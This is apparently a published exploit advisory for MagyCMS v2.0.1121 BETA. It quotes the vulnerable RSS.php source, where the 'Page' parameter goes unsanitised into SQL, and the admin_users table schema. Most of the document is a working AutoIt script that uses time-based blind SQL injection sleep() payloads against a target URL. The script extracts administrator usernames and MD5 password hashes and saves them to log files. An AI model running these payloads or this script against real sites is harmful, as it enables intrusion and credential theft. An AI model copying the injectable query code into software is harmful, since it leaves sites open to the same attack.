return $row[0];
}
//////////////////// Opening database connection ////////////////
$db = &ADONewConnection($DBType);
$db->PConnect($DBServer,$DBUserName,$DBPassword,$DBName);
// Switch to the specified charset
if($DBType=="mysql") $db->Execute("SET NAMES \"$DBCharset\"");
///////////////////////// Get Site ID ///////////////////////////
if (isset($_GET['site'])) {
$SITEID = $_GET['site'];
if (!is_numeric($SITEID))
$SITEID = 1;
} else {
$SITEID = 1;
}
////////////////// Get site URL from DB /////////////////////////
$hResult = $db->Execute("SELECT `URL` FROM $tbl_Sites WHERE `ID`=$SITEID");
$Root_URL = "aaa";
if ($hResult->NumRows())
{
$row = $hResult->FetchRow();
$Root_URL = $row[0];
}
//echo($Root_URL."<br>");
////////////////// Retrieving Language Prefixes /////////////////
$Lang_Prefix = array();
$hpResult = $db->Execute("SELECT `ID`, `Prefix` FROM $tbl_Lang WHERE `site`=$SITEID");
if($hpResult) {
for($i = 0; $i < $hpResult->RowCount(); $i++) {
$apResult = $hpResult->FetchRow();
$Lang_Prefix[$apResult[0]] = $apResult[1];
}
}
///////////////////////// Determine language ////////////////////
if (isset($_GET['lang'])) {
$lang = $_GET['lang'];
if (!is_numeric($lang))
$lang = GetSiteSetting('Default_lang');
} else {
$lang = GetSiteSetting('Default_lang');
}
///////////////////////// Determine news Page and Category //////
$cat = -1;
$page = "";
if (isset($_GET['Page'])) {
$page = $_GET['Page'];
$cat = getCatByPage($page);
}
//////////////////// Get Page information if such exists ////////
$title = "News";
$text = "";
if ($page != "")
{
$pQuery = "SELECT `ID` FROM `$tbl_Pages` WHERE `Name`='$page' AND `site`=$SITEID";
$hResult = $db->Execute($pQuery);
if (!$hResult->NumRows())
return -1;
$row = $hResult->FetchRow();
$ID = $row[0];
// Fetch Title and Text form DB;
$pQuery = "SELECT Title, Text
FROM $tbl_News_Config AS s INNER JOIN $tbl_News_Config_Data AS d ON s.ID = d.ID
WHERE s.ID=$ID AND d.language=$lang AND site=$SITEID";
$hResult = $db->Execute($pQuery);
if ($hResult->NumRows())
{
$row = $hResult->FetchRow();
$title = $row[0];
$text = $row[1];
}
}
// Construct link to News page
$mainLink = ($page == "") ? "" : $Root_URL.CLink::construct($page, $lang);
///////////////////////// GET NEWS //////////////////////////////
if ($cat == -1)
$mainQuery = "SELECT s.`ID`, s.`Date`, d.`Title`, d.`ShortText` , `start_date` , `end_date`
FROM $tbl_News_Struct AS s INNER JOIN $tbl_News_Data AS d ON s.`ID`=d.`ID`
WHERE d.language=$lang AND s.`site`=$SITEID";
else
$mainQuery = "SELECT s.`ID`, s.`Date`, d.`Title`, d.`ShortText` , `start_date` , `end_date`
FROM $tbl_News_Struct AS s INNER JOIN $tbl_News_Data AS d ON s.`ID`=d.`ID`
WHERE d.language=$lang AND s.`site`=$SITEID AND s.`Category`=$cat";
$hResult = $db->Execute($mainQuery);
// check if there is something to echo
if (!$hResult->NumRows())
die();
///////////////////////// Echo News in RSS //////////////////////
CRSS::echoHeader($title, $mainLink, $text, getdate(), $Lang_Prefix[$lang]);
for ($i = 0; $i < $hResult->NumRows(); $i++)
{
$row = $hResult->FetchRow();
$today = date("Y-m-d H:i:s");
$startDate = $row[4];
$endDate = $row[5];
$startDateIsOK = (substr($startDate, 0, 10) == "0000-00-00" || $today >= $startDate);
$endDateIsOK = (substr($endDate, 0, 10) == "0000-00-00" || $today <= $endDate);
if ( $startDateIsOK && $endDateIsOK )
{
$link = $Root_URL.CURL::getFormattedURL(CLink::construct($page, $lang), "id", "{$row[0]}");
CRSS::echoItem($row[2], $link, $link, $row[1], $row[3]);
}
}
CRSS::echoFooter();
?>
<?
class CRSS {
public static function echoHeader ($title, $link, $desc, $lastBD, $lang)
{
// send XML header
header('Content-Type: application/rss+xml; charset=utf-8');
// echo XML header
echo('<?xml version="1.0" encoding="utf-8"?>');
// echo RSS opening tags
echo('<rss version="2.0"><channel>\n');
if ($title != "") echo ("<title>$title</title>\n");
if ($link != "") echo ("<link>$link</link>\n");
if ($desc != "") echo ("<description>$desc</description>\n");
if ($lastBD != "") echo ("<lastBuildDate>$lastBD Mon, 12 Sep 2005 18:37:00 GMT</lastBuildDate>\n");
if ($lang != "") echo ("<language>$lang en-us</language>\n");
}
public static function echoFooter ()
{
// echo RSS closing tags
echo('</channel></rss>');
}
public static function echoItem($title, $link, $guid, $pubDate, $desc)
{
// Strip undesired characters from description
$desc = ereg_replace("&[^;]*;", "", $desc);
$desc = strip_tags($desc);
// Turn Published date into RFC format
$time = strtotime($pubDate);
$pubDate = gmdate("r", $time);
// Echo the item
echo ("<item>\n");
if ($title != "") echo ("<title>$title</title>\n");
if ($link != "") echo ("<link>$link</link>\n");
if ($guid != "") echo ("<guid>$guid</guid>\n");
if ($pubDate != "") echo ("<pubDate>$pubDate</pubDate>\n");
if ($desc != "") echo ("<description>$desc</description>\n");
echo ("</item>\n");
}
}
?>
*/
========================= END OF VULNERABLE CODE SECTION ===========================
mysql> show tables \g
±------------------------+
| Tables_in_SNIP_SNIP_SNIP|
±------------------------+
| admin_menus |
| admin_menus_category |
| admin_menus_permissions |
| admin_users |
| banner_categories |
| banners |
| banners_data |
| banners_struct |
| cms_languages |
| cms_messages_categories |
| cms_messages_data |
| cms_messages_struct |
| cms_settings |
| core_messages |
| counter |
±------------------------+
15 rows in set (0.00 sec)
mysql> explain admin_users \g
±---------±-----------------±-----±----±--------±---------------+
| Field | Type | Null | Key | Default | Extra |
±---------±-----------------±-----±----±--------±---------------+
| ID | int(10) unsigned | NO | PRI | NULL | auto_increment |
| Username | varchar(100) | YES | | 0 | |
| Password | varchar(100) | YES | | 0 | |
| GUID | varchar(32) | YES | | 0 | |
| Level | int(10) unsigned | YES | MUL | 0 | |
| Name | varchar(100) | YES | | 0 | |
| Email | varchar(45) | YES | | 0 | |
| MID | int(10) unsigned | YES | | 0 | |
±---------±-----------------±-----±----±--------±---------------+
8 rows in set (0.00 sec)
A R E Y O U R E A D Y?
LETS GOOOOOOOOOOOOOOOOOOOOOOOOOOO!
#ce
Global $USERNAMES_IN_ARRAY,$MD5HASHSTRINGSIN_ARRAY,$dd
;// COMMAND LINE //
if $CmdLine[0]=0 Then
MsgBox(64,"","This is a console application." & @CRLF & "Usage: " & @CRLF & @ScriptName & ' http://targetsite.tld')
Exit
EndIf
$host=$CmdLine[1]
if $host='' Then
ConsoleWrite(@CRLF & '[+] Empty Command Line Argument? WTF? [+]' & @CRLF)
Exit
EndIf
ConsoleWrite(@CRLF)
$hellomsg= _StringRepeat('#',54) & @CRLF
$allmsg=$hellomsg & '# MagyCMS v2.0.1121 BETA Blind SQL Injection Exploit #' & @CRLF & _
'# Exploitation technique: Time Based #' & @CRLF & _
'# Author: AkaStep & BOT_25 #' & @CRLF & _
$hellomsg;
ConsoleWrite($allmsg);
$useragent='Mozilla/5.0 (Windows NT 5.1; rv:14.0) Gecko/20100101 Firefox/14.0.1';
#cs
First checking is here any internet connection?
#ce
$separator=@CRLF & _StringRepeat('-',40) & @CRLF;
ConsoleWrite($separator & '[+] Verifying your internet connection… Please Wait…[+] ' & $separator)
Sleep(1500)
$hcheckconnectionstatus='http://packetstormsecurity.org';// 100% TODD will kill me ASAP for this xD)
HttpSetUserAgent($useragent)
$is_offline_or_online=_INetGetSource($hcheckconnectionstatus,True);
if @error Then
ConsoleWrite($separator & "[+] Sorry Dude! It seems your machine is offline. [+] " & @CRLF & "[+] Can't continue…Exit. [+] " & $separator);
Exit
EndIf
ConsoleWrite($separator & '[+] Inet Connection is OK … [+] ' & $separator)
$target=$host & "/magycms/Framework/public/RSS.php?Page="
;// Vulnerable versions of magycms always panics here by exposing following message to public.
$isvulnerable='Call to a member function NumRows() on a non-object';// Peace of Blah Blah Stuff :P
$possiblevals='';//initializing of variable…
$forusernames='';// initializing it too…
for $i=28 to 61
$forusernames&=Chr(Asc("A")+$i) & @CRLF
Next
for $i=0 To 9
$possiblevals&=$i & @CRLF
; nums from 0 1 2 3 4 5 6 7 8 up to 9
Next
; then alphas from a b c d e up to f
$forusernames&=$possiblevals;
$possiblevals&='a' & @CRLF & 'b' & @CRLF & 'c' & @CRLF & 'd' & @CRLF & 'e' & @CRLF & 'f' & @CRLF
$array=StringSplit($possiblevals,@CRLF,3)
$bruteusernames=StringSplit($forusernames,@CRLF,3);
$i='';//reset.
ConsoleWrite($separator & '[+] Verifying is Target Site Vulnerable? Please wait…[+]' & $separator);
$maybe=_INetGetSource($target & "'",TRUE) ;//verifying…Is target site vulnerable?
if StringInStr($maybe,$isvulnerable,0) Then
$true='vulnerable'; // GPC=OFF
ConsoleWrite($separator & '[+] Reply from target site: [+]' & @CRLF & $separator & '[+] - - - - * Vulnerable! * - - - - . [+]' & $separator & @CRLF & _
'[+] Trying to get average value for sleep(1) if condition is TRUE…[+]' & @CRLF & $separator & '[+] Please wait… [+] ' & $separator & @CRLF);
$additionalchecking_needed='false';
;// Will check 3 times (with TRUE condition) to get optimal avg value.
;//////////////////// Responce time when condition is TRUE //////////////
local $docalc;
for $i=1 to 3
$checkfirsttime=TimerInit();
HttpSetUserAgent($useragent);
_INetGetSource($target & "' or (select if(8='8',sleep(1),0))– AnD 9='9",True);
$rtime=TimerDiff($checkfirsttime);
$docalc+=$rtime;
Next
$checkfirsttime='';
$rtime='';
$i='';
$docalcavg=Int($docalc/3);//avg value for sleep(1).
$docalc='';
ConsoleWrite($separator & '[+] AVG sleep timeout FOR TRUE CONDITION IS: ' & $docalcavg & ' ms [+]' & $separator);
;////////////// EOF TRUE CONDITION CHECKING ///////////////////////////
;////////////////////// WITH FALSE CONDITION ///////////////////////////
for $i=1 to 3
$checkfirsttime=TimerInit();
HttpSetUserAgent($useragent);
_INetGetSource($target & "' or (select if(8='index.php',sleep(1),0))– AnD 9='9",True);
$rtime=TimerDiff($checkfirsttime);
$docalc+=$rtime;
Next
$checkfirsttime='';
$rtime='';
$i='';
$avgfalsecondition=Int($docalc/3);
$docalc='';
ConsoleWrite($separator & '[+] AVG sleep timeout FOR FALSE CONDITION IS: ' & $avgfalsecondition & ' ms [+] ' & $separator);
;//////////////// END OF FALSE CONDITION ///////////////////////////////
getusername();// Fetch usernames Baby)//
Else
$true='not vulnerable'; //GPC =ON ?
ConsoleWrite($separator & '[+] Target Site is NOT vulnerable:( .Exit. [+]' & $separator)
;// Lazy to verify it using another technique.
Exit
EndIf
Func getusername()
;//Brain f****cking
Local $oldoffset=0
$USERNAMES='';
ConsoleWrite($separator & '[+] Getting To Fetch Username(s) from table… Please wait… [+] ' & $separator)
$usernamen='';
$tyi=0;
$x=0;
$stopat=0;
do
$tyi+=1
$stopat+=1
if $tyi=21 Then
$tyi=1;
$x+=1
$USERNAMES&=$usernamen & @CRLF
$usernamen='';//reset
EndIf
$limitval= ' limit 1 offset ' & $x
if $x<6 and $stopat<=5160 Then
for $q=1 To UBound($bruteusernames) - 2
$fetch_username=$target & "' or (select if(substr(Username," & $tyi & ",1)='" & $bruteusernames[$q] & "',sleep(1),0) from admin_users" &$limitval & ")– AnD 4='4" & @CRLF
$timer=TimerInit();
HttpSetUserAgent($useragent);
$inethandle=_INetGetSource($fetch_username,True)
$diftime=TimerDiff($timer);
if ($diftime/$docalcavg)>=0.8 Then
$usernamen&=$bruteusernames[$q]
ConsoleWrite('[+] TRUE AT OFFSET [' & $x & '] Currently : [' & $usernamen & ']. Responce Time: ' & $diftime & ' ms. Logging to axa.txt… [+]' & @CRLF);
FileWrite('axa.txt',$separator & @CRLF & '[+] TRUE AT OFFSET[' & $x & ']' & @CRLF & $usernamen & @CRLF & 'Current Payload: ' & $fetch_username & @CRLF &'Responce Time: ' & $diftime & ' ms ' & @CRLF & $separator)
EndIf
$timer='';
$inethandle='';
$diftime='';
Next
;//
EndIf
until $x=6
$USERNAMES_IN_ARRAY=StringSplit($USERNAMES,@CRLF,3);
; debug ok _ArrayDisplay($USERNAMES_IN_ARRAY);
$y='';
for $i=0 to UBound($USERNAMES_IN_ARRAY) - 1
if Not $USERNAMES_IN_ARRAY[$i]='' Then
$y+=1;
ConsoleWrite($separator & '[#] Username' & $i & ' => [' & $USERNAMES_IN_ARRAY[$i] & '] [#]' & $separator)
EndIf
Next
$i='';
ConsoleWrite($separator & '* Total ' & $y & ' users *' & $separator)
$y='';
ConsoleWrite($separator & '[+] END OF USERNAME FETCHING. PREVIOUS RECORDS ARE COMPLETE USERNAMES [+]' & $separator)
ConsoleWrite($separator & '[+] GOING TO FETCH MD5 PASSWORDS. This may take few minutes too. Please wait… [+]' & $separator)
;// debug ok! Exit //
MD5EDPASSWORD();//Yeah baby it's time to fetch MD5 passwords.//
EndFunc;=> getusername();
;//Below:Get passwords Function.
Func MD5EDPASSWORD()
Local $stopat;
Local $md5hash;
$MD5HASHSTRINGS='';
if $true='vulnerable' Then
for $rt=0 To 6
if not $md5hash='' Then
$MD5HASHSTRINGS&=$md5hash & @CRLF
EndIf
$md5hash='';// we need reset obtained hash here if offset incremented.
$stopat+=1;
if $rt<6 And $stopat<=3072 Then
for $x=1 to 32 ;// because => strlen('MD5-ED-STRING')=32 . We need loop through it.
for $i=0 to UBound($array) - 2
$dynamicpayload="' or (select if(substr(Password," & $x & ",1)='" & $array[$i] & "',sleep(1),0) from admin_users limit 1 offset " & $rt & ")– AND 5='5"
$doittime=TimerInit();
HttpSetUserAgent($useragent);
$trigger2=_INetGetSource($target & $dynamicpayload,TRUE)
$responcetime=TimerDiff($doittime);
if ($responcetime/$docalcavg) >=0.8 Then ;//Sleep()-ed. 99% chance that we got it!
$md5hash&=$array[$i]
$howmuchneeded=32-StringLen($md5hash);
if $howmuchneeded='0' then
$howmuchneeded=' NONE '
EndIf
$tolog=$separator & '[+] TRUE AT OFFSET [' & $rt & '] [+]' & @CRLF & 'Currently MD5 hash is : ' & $md5hash & @CRLF & 'Responce Time: ' & $responcetime & ' ms.' & @CRLF & 'Need to fetch other: [' & $howmuchneeded & '] symbol(s). ' & @CRLF & 'Logging to axa.txt… ' & $separator
ConsoleWrite($tolog);
FileWrite('axa.txt',$tolog);
$tolog='';
EndIf
Next
Next
EndIf
Next
;// DISPLAYING PLUS SAVING TO MAINLOG.TXT
$MD5HASHSTRINGS_IN_ARRAY=StringSplit($MD5HASHSTRINGS,@CRLF,3);
for $i=0 To UBound($USERNAMES_IN_ARRAY) - 2
if Not $USERNAMES_IN_ARRAY[$i]='' and Not $MD5HASHSTRINGS_IN_ARRAY[$i]='' Then
$dd&=$separator & 'Username: [' & $USERNAMES_IN_ARRAY[$i] & '] MD5 HASH: [' & $MD5HASHSTRINGS_IN_ARRAY[$i] & ']' & $separator
EndIf
Next
ConsoleWrite($separator & $dd & $separator)
FileWrite(@ScriptDir & "\mainlog.txt",$separator & 'Target Site: ' & $host & @CRLF & $dd & @CRLF)
ConsoleWrite($separator & '[+] Usernames And MD5 passwords saved to : mainlog.txt [+]' & $separator)
for $i=0 to 2
Sleep(1000);
Beep(200,300);
Next
ConsoleWrite($separator & '[+] Exploit Finished!. GooD Luck;) [+]' & $separator)
ConsoleWrite('[+] Exit! [+]');
Exit;
EndIf
EndFunc;=> MD5EDPASSWORD();
#cs
Thats All!
********************* AZERBAIJAN BLACK HATZ***********************************
Of course we never forget our friends so, A BIG RESPECTS+THANKS TO ALL:
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
1337day.com
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all AA Team + to all Azerbaijan Black HatZ +
Especially to my bro CAMOUFL4G3.
Thanks + Respect to all friends!
/AkaStep & BOT_25
#ce